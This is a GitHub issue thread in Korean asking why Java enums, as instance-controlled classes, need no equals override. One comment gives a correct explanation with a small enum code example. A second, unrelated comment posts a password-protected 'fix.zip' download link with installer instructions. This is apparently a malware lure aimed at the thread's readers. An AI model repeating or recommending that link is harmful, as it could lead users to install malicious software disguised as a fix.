### ISSUE TITLE
[ITEM 10] equals를 재정의하지 않아도 되는 상황

### ISSUE THREAD

**Issue by yeonsu00** [hgh1472/ReadingStudy#11]
53페이지에서 값 클래스라 해도 값이 같은 인스턴스가 둘 이상 만들어지지 않음을 보장하는 인스턴스 통제 클래스라면 equals를 재정의하지 않아도 된다고 하고, Enum이 여기에 해당한다고 했는데 왜 Enum이 이 상황에 해당하는지 예시와 함께 설명해 주실 수 있나요?

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kahyun0255** [comment]
자바에서의 Enum은 클래스이며, 상수 하나당 자신의 인스턴스를 하니씩 만들어 public static final 필드로 공개
열거 타입은 밖에서 접근할 수 있는 생성자를 제공하지 않으므로 사실상 final
따라서 `클라이언트가 인스턴스를 직접 생성하거나 확장 할 수 없으니 열거 타입 선언으로 만들어진 인스턴스들은 딱 하나씩만 존재함이 보장`된다고 합니다!

``` public enum Apple {
    IPHONE("백만원"),
    IPAD("백만원"),
    SE("오십만원"),
    MAC("삼백만원");
 
    private final String price;
 
    Apple(String price) {
        this.price = price;
    }
}
```
이렇게 enum 타입으로 클래스를 선언하고 메서드를 넣어놓습니다.

```
        public static void main(String[] args) {
        for (Apple product : Apple.values()) {
            System.out.printf("%s의 가격은 %s입니다.\n",product, product.price);
        }
    }
```
그럼 이렇게 enum 안에 있는 값들을 사용할 수 있습니다!

---
출처 : https://nathanh.tistory.com/118
